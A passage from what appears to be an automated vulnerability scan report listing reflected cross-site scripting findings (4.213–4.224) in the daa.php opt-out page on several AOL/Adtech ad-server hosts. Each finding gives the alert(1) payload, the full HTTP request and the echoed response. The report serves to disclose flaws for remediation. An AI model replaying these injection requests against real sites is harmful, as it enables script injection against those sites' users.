Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai66562"-alert(1)-"f0b38dc9031/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...
4.213. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 132a8"><script>alert(1)</script>317fcc58724 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.php132a8"><script>alert(1)</script>317fcc58724?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adserverec.adtechus.com/nai/daa.php132a8"><script>alert(1)</script>317fcc58724?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.214. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eadc4"-alert(1)-"8c6b8b92dce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpeadc4"-alert(1)-"8c6b8b92dce?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpeadc4"-alert(1)-"8c6b8b92dce?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...
4.215. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8037b"><script>alert(1)</script>591bd77e80a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai8037b"><script>alert(1)</script>591bd77e80a/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adserverwc.adtechus.com/nai8037b"><script>alert(1)</script>591bd77e80a/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.216. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 277f9"-alert(1)-"07ac62dda36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai277f9"-alert(1)-"07ac62dda36/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai277f9"-alert(1)-"07ac62dda36/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...
4.217. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49125"-alert(1)-"a000c7a7778 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php49125"-alert(1)-"a000c7a7778?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:40 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php49125"-alert(1)-"a000c7a7778?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...
4.218. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf266"><script>alert(1)</script>d564e59c57c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.phpbf266"><script>alert(1)</script>d564e59c57c?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adserverwc.adtechus.com/nai/daa.phpbf266"><script>alert(1)</script>d564e59c57c?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.219. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f97cb"-alert(1)-"0c8882be1df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naif97cb"-alert(1)-"0c8882be1df/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naif97cb"-alert(1)-"0c8882be1df/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...
4.220. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56a7"><script>alert(1)</script>59d2f9af648 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naif56a7"><script>alert(1)</script>59d2f9af648/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adsonar.com/naif56a7"><script>alert(1)</script>59d2f9af648/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.221. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71dba"-alert(1)-"4efdfb45428 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php71dba"-alert(1)-"4efdfb45428?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php71dba"-alert(1)-"4efdfb45428?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...
4.222. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c495"><script>alert(1)</script>c9f10cb16a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.php5c495"><script>alert(1)</script>c9f10cb16a2?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adsonar.com/nai/daa.php5c495"><script>alert(1)</script>c9f10cb16a2?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.223. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1781b"><script>alert(1)</script>2d22090a413 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai1781b"><script>alert(1)</script>2d22090a413/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adtech.de/nai1781b"><script>alert(1)</script>2d22090a413/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.224. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab3fa"-alert(1)-"572cca33a62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naiab3fa"-alert(1)-"572cca33a62/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:20 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13708

